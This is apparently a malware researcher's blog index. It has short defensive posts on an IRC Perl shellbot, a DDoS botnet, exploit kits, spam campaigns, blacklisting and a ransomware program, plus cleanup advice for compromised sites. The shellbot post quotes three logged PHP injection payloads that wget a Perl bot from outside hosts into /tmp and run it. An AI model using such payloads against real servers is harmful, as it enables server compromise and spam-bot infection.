“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently You maybe saw strange input in server logs…

Something like:

<?php system(“wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

 

What does that mean? Well, first of all, Your server potentially vulnerable to the  PHP code injection, at least. Check and update\patch\fix it.

Second – check for processes, that run from /tmp/ folder and with default Apache user.  If there are – You’ve been infected. Take care of it

Now, how exactly this stuff looks like?

Header:

 

header

VT sample, in case You curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It’s IRC Server-oriented bot, with the main capability to SPAM. Language looks like Portuguese- Brazilian?

It also seen in wild since 2012, at least, Google said 🙂 But older versions had less functionality. And now it back 🙂

That’s how it behave:

1. Script connect to IRC server, protected with credentials [unfortunately, it not available now]

2. Fetch list of the mails, names and addresses for replies from embedded URLs, compose the mail messages and send them in behalf of Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and  execution

And, since fun is everything in the malware hunting:

One of functions:

func

🙂 he\she is so exited 🙂

It’s not new player on this game field, but recently he\she back in business, so please be aware.

Well, review Your logs and\or update me, in case You have some additional info.

Stay safe

D.L.

Tags :       

Malware hunt – wildfowl to find

2014.01.31

More than twice for the last 24 hours I was asked the non-trivial question:

Where do You find the targets for the malware hunt, if You’re not a  part of the big team, malware researcher or not own a honeynet.

Actually, if You do want to fight a malware, IMHO it is very useful to have a honey-pot system, or, at least, be in security business somehow. It will provide You a non-stop flow of the malicious targets to review. But if  You not, and You still want to help?

Disclamer: All links provided lead to lists of malicious or potentially malicious resources. Do not click there on any link, or don’t run any file, without proper knowledge, env prepared and skills trained.

Well, here are the few links, that  aggregate latest known threats, that You can practice on:

Read more…

Ferret DDoS botnet v2.2 – inside the C&C panel

2013.12.23

Hi all

Today story about Ferret DDoS bot. 🙂

logo

For those who missed it – I started to hunt Ferret at about a month ago:

http://twitter.com/it4sec/status/407021953611210752

And about a week ago a research of Arbor Networks posted with quite nice analysis. Read it HERE.

It’s the end? 🙁 Nope.

Read more…

“PowerLoader v2.0 and sons” – communication protocol details

2013.05.29

First of all – for those who do not know, what PowerLoader is:

pl1

From ‘Aliens’ movie. Always wanted one to clean mess in my room at my teen-age.

But – we will talk about another Power Loader – v2.0

pl2

Read more…

“NY TRAFFIC TICKET” SPAM is back

2013.03.27

Well, it was gone for a while, and here it back 🙂

Email message sample:

mail1

 

Actually code looks like:

mail3

 

Attack, actually, run for about 48 hours already at least. You may see traces of it on URLQuery [36 entries by now]

When clicked – lead to BHEK2

mail2

 

BHEK2 payload – Cridex [22/46] and Fareit.

Second binary is interesting one, yes 🙂 Wait for updates.

Stay safe!

D.L.

Tags :   

Cool Exploit Kit – “We Try harder!”

2013.03.13

Heh, when I am sick – it’s time to hunt…

Prerequisites: 

Temperature: 37.8 C

Local Time: 23:00

Mood: [censored]

Test machine: fully updated (pdf, flash, java up to 7.u17)

Live Exploit Kits in list: 5

What we testing:

How dangerous can be surfing for those who follow best practices – at least performing updates.

Results:

All behavior among tested Exploit Kits, can be described as:

– If plugin-detect present, than system realize that no vulnerable plugins detected, and

– no exploit served at all [Safe End]

– last available Java exploit served. [Fail]

– If plugin-detect not present, than all available exploits execute and fail.

* Sometimes LibTiff exploit crash the PDF plugin, once Java cause error message appears…

Bottom line – if machine is up to date – well, leave it, there are plenty of easy targets around. 

Except for Cool Exploit Kit. Let me show You some fun stuff there… 

Read more…

Security is everyone’s concern, or why Blacklisting fail.

2013.03.12

“Democracy is the worst form of government, except for all those other forms that have been tried from time to time.” (Winston Churchill)

I wrote huge philosophic part here… But then – I realized, that too much ideology already dumped into Net, no need to add.

So – see mr. Churchill quote and add “BlackListing” instead of “Democracy” << this is exactly my point.

And making long story short – in providing protection against malware – blacklisting fail.

Why? Simple.

Blacklisting – “…a blacklist or block list is a basic access control mechanism that allows through all elements (email addresses, users, URLs, etc.), except those explicitly mentioned. Those items on the list are denied access…” (WikiPedia.org)

So, basically, how it should work:

1. Someone detect that IP x.x.x.x or domain badassmalwarehomepage.com is spreading malware, got Exploit Kit installed or some other malicious activity detected

2. IP or domain list added to blacklist – now all software that work with that blacklist, protected from entering this bad site.

3. Internet Safe! (Yeah… )

And how it works now:

1. Malicious IP or domain detected. It take some time to detect new attack, discover all infectors, gather all evidence and prepare to be reported

2. IP\domain reported. There are plenty of different lists, each have it rules. Take some time to re-check and add to list – otherwise it can be used for malicious purposes. 

3. Clients not up to date, lists delivered from time to time, check with list take time and traffic. And bottom line – in fastest way it take 2-3 days to get stuff done. Attacker already got profit, monetized and planning new attack. 

Nothing new for many of You, and as I said – it’d terrible solution, but we dont have another now.

But wait – it even worse 🙂

Malware don’t need to have it’s own IP\domain exposed to victims, or even malware researchers, on any level. Let me show You, how. 

Read more…

Tags :     

CrimeBoss Exploit Kit – Java CVE-2013-0422 + SE tricks :)

2013.03.06

CrimeBoss EK already known, described and You may see it here:

KahuSecurity

MalwareSigs

So I will not paste all details step-by-step. Who interested – see it here.

What was interesting in this case in particular – Java exploit, that  try to convince victim, that it is Adobe Flash Player . 🙂

cbek2

Not new, actually, You right. @kafeine recently posted some details about similar behavior of recent Java exploit in Popads EK.

So – as You may see, idea appear to spread among other malware spreaders as well. 🙂

Actually, if You press “Cancel” in this point, no harm done to Your machine (if Java is up to date).

If Java is outdated – 2 additional exploits served as well.

Here samples on VT:

Java:

JAR1 JAR2 JAR3

Exe:

Bin [6/46]

That’s all

Stay safe

D.L.

 

 

List of compromised domains [2725] that spread RedKit EK.

2013.02.03

Hi all, folks.

Need Your help.

For last few month we were looking former Redkit spreading all over, using compromised websites to get into victim machines.

At this point, united tracker results indicate that at least 2725 unique domains were compromised and participated in Redkit spreading from 11.11.2012 till 31.01.2013

Since I literally have no free time to manage all cleanup process and no resources to provide support to owners of those web-resources (major part of them even not respond to mail), here is list 

Please note, that this list not 100% solid, there were few changes in Exploit Kit spreading system that tracking agent need to be reconfigured, but bottom line is – its at least 90% accurate.

Some domains were cleaned up, some – abused and took down by hoster company or owner. Most of listed hosts still infected, I assume. And since MDS system reuse them frequently, once they’ll appear to be malicious again. Please act accordingly.

In case Your website listed in here:

Removal instructions [for site\host\shared hosting services Owners]:

1. Search for .htaccess files and php.ini or .user.ini files in root directories, check them for mod_rewrite.c entries (see more details here)

2. Clean  files attached in mod_rewrite.c section of .htaccess

3. Hire security professional that will harden Your website\service to prevent future intrusions. If not – malware will return. 

Stay Safe!

D.L.

 

Inside “4 horses club” malware >> social details :)

2013.02.01

It’s too big for twitter, so I post it as separate blog post.

Some time ago I posted info about ransomware from “4 horses club”. Grab it HERE.

Here is login page of this Aff program for partners (click for bigger pic)

4h

Read more…